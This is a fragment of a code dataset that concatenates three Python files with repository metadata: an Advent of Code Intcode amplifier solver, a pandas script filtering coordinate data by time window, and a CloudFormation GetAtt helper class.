INPUT = read_input('day7')
def parse_instruction(instruction: int) -> Tuple[int, int, int, int]:
return (instruction % 100 // 1,
instruction % 1000 // 100,
instruction % 10000 // 1000,
instruction % 100000 // 10000)
class Amplifier:
def __init__(self, code: str, phase_setting: int):
self.i = 0
self.mem = list(map(int, code.split(',')))
self.inputs = [phase_setting]
def run(self, input_signal: int) -> Optional[int]:
self.inputs.append(input_signal)
def param(num: int) -> int:
return self.mem[self.i + num]
def param_value(param_num: int) -> int:
p = param(param_num)
mode = modes[param_num - 1]
if mode == 0:
return self.mem[p]
elif mode == 1:
return p
else:
raise RuntimeError('Unrecognized mode')
while True:
opcode, *modes = parse_instruction(self.mem[self.i])
if opcode == 1:
self.mem[param(3)] = param_value(1) + param_value(2)
assert modes[2] == 0
self.i += 4
elif opcode == 2:
self.mem[param(3)] = param_value(1) * param_value(2)
assert modes[2] == 0
self.i += 4
elif opcode == 3:
self.mem[param(1)] = self.inputs.pop(0)
assert modes[0] == 0
self.i += 2
elif opcode == 4:
ret_val = param_value(1)
self.i += 2
return ret_val
elif opcode == 5:
if param_value(1) != 0:
self.i = param_value(2)
else:
self.i += 3
elif opcode == 6:
if param_value(1) == 0:
self.i = param_value(2)
else:
self.i += 3
elif opcode == 7:
if param_value(1) < param_value(2):
self.mem[param(3)] = 1
else:
self.mem[param(3)] = 0
self.i += 4
elif opcode == 8:
if param_value(1) == param_value(2):
self.mem[param(3)] = 1
else:
self.mem[param(3)] = 0
self.i += 4
elif opcode == 99:
return None
else:
raise RuntimeError(f"Unexpected opcode: {opcode}")
def day7(input_: str):
part1(input_)
part2(input_)
def part1(input_):
signals = []
for a, b, c, d, e in permutations(range(5)):
a_output = Amplifier(input_, a).run(0)
b_output = Amplifier(input_, b).run(a_output)
c_output = Amplifier(input_, c).run(b_output)
d_output = Amplifier(input_, d).run(c_output)
e_output = Amplifier(input_, e).run(d_output)
signals.append(e_output)
print(max(signals))
def part2(input_):
signals = []
for a, b, c, d, e in permutations(range(5, 10)):
amplifiers = {
'a': Amplifier(input_, a),
'b': Amplifier(input_, b),
'c': Amplifier(input_, c),
'd': Amplifier(input_, d),
'e': Amplifier(input_, e),
}
last_output = 0
last_loop = False
while not last_loop:
for key, amplifier in amplifiers.items():
output = amplifier.run(last_output)
if output is None:
last_loop = True
else:
last_output = output
signals.append(last_output)
print(max(signals))
if __name__ == '__main__':
part1(INPUT)
part2(INPUT)
| [
"4470828+andrehsu@users.noreply.github.com"
] | 4470828+andrehsu@users.noreply.github.com |
cf84b8508c24aa61ea4018468c09b1302f383a08 | cd11a7fafe7d5ac6561ee2b1760d6a75a9df5757 | /bigdata.py | 06b134c5c31858a3744fd1b578cb0e10f5d85976 | [] | no_license | zhongyuanbaike/Python | 217731f99a53f9480cd471e39429e0fafd84f1b2 | ed0aed89539aa87ccdc0fb2108e8df165dc59b6b | refs/heads/master | 2020-04-11T06:21:26.814676 | 2019-03-13T06:44:14 | 2019-03-13T06:44:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 732 | py | import pandas as pd
reader = pd.read_csv('F:\\world.txt',iterator=True,error_bad_lines=False)
chunk = reader.get_chunk(50000000)
df=pd.DataFrame(chunk)
df.dropna()
df.columns = ['date', 'b', 'c', 'd']
df['date'] = pd.to_datetime(df['date']) #将数据类型转换为日期类型
df = df.set_index('date') # 将date设置为index
i=24
num_1=str(i)
num_2=str(i+1)
df = df['2016-01-'+num_1+' 21:00:00':'2016-01-'+num_2+' 00:00:00']
print(df)
df_1 = df[df.b >= 31.15]
df_2 = df_1[df_1.b <= 32.7]
df_3 = df_2[df_2.c >= 118.23]
df_4 = df_3[df_3.c <= 119.3]
# df_4.to_csv('F:\\timedata\\1.txt',index = False)
df_4 = df.groupby(['b', 'c']).sum()
df_4.to_csv('F:\\timedata\\1.txt',encoding = 'utf-8')
| [
"noreply@github.com"
] | zhongyuanbaike.noreply@github.com |
5432391a83b8c960663d3cef2f2aa55994ff307a | c4bfd8ba4c4c0f21bd6a54a9131f0985a5a4fa56 | /crescent/functions/get_att.py | 704a83a8c9e664be800a85836e5778252c98e7a2 | [
"Apache-2.0"
] | permissive | mpolatcan/crescent | 405936ec001002e88a8f62d73b0dc193bcd83010 | 2fd0b1b9b21613b5876a51fe8b5f9e3afbec1b67 | refs/heads/master | 2022-09-05T04:19:43.745557 | 2020-05-25T00:09:11 | 2020-05-25T00:09:11 | 244,903,370 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 528 | py | from .fn import Fn as AnyFn, FnArrayValue
from typing import Union
class GetAtt(FnArrayValue):
def __init__(self):
super(GetAtt, self).__init__(
fn_name=GetAtt.__name__,
field_order=[self.Resource.__name__, self.Attribute.__name__]
)
def Resource(self, resource_id: Union[str, AnyFn]):
return self._set_field(self.Resource.__name__, resource_id)
def Attribute(self, attribute: Union[str, AnyFn]):
return self._set_field(self.Attribute.__name__, attribute)
| [
"mutlupolatcan@gmail.com"
] | mutlupolatcan@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.